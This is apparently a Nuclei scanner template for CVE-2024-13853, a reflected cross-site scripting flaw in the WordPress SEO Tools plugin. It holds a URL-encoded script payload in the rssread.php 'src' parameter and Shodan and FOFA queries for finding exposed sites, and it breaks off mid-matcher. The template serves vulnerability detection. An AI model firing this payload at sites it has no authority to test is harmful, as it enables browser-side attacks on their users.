id: CVE-2024-13853 info: name: WordPress SEO Tools Plugin 4.0.7 - Cross-Site Scripting author: ritikchaddha severity: medium description: | The SEO Tools WordPress plugin through version 4.0.7 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'src' parameter in the rssread.php file before outputting it back in the page, which could allow attackers to execute arbitrary JavaScript code in a victim's browser. impact: | Unauthenticated attackers can execute arbitrary JavaScript in a victim's browser via the src parameter, potentially stealing cookies or credentials. remediation: | Update SEO Tools plugin to a version newer than 4.0.7. reference: - https://wpscan.com/vulnerability/52991dd9-41f7-4cf8-b8c9-56dd4e62bf0c - https://nvd.nist.gov/vuln/detail/CVE-2024-13853 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2024-13853 cwe-id: CWE-79 epss-score: 0.006 epss-percentile: 0.46103 metadata: max-request: 1 vendor: WordPress product: seo-automatic-seo-tools shodan-query: http.html:"seo-automatic-seo-tools" fofa-query: body="wp-content/plugins/seo-automatic-seo-tools/" tags: cve,cve2024,wp,wordpress,wp-plugin,xss,seo-automatic-seo-tools,vuln flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}" redirects: true matchers: - type: word part: body words: - 'seo-automatic-seo-tools' internal: true - method: GET path: - "{{BaseURL}}/wp-content/plugins/seo-automatic-seo-tools/feedcommander/rssread.php?src=1%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cscript%3E" matchers-condition: and matchers: - type: word part: body words: - '">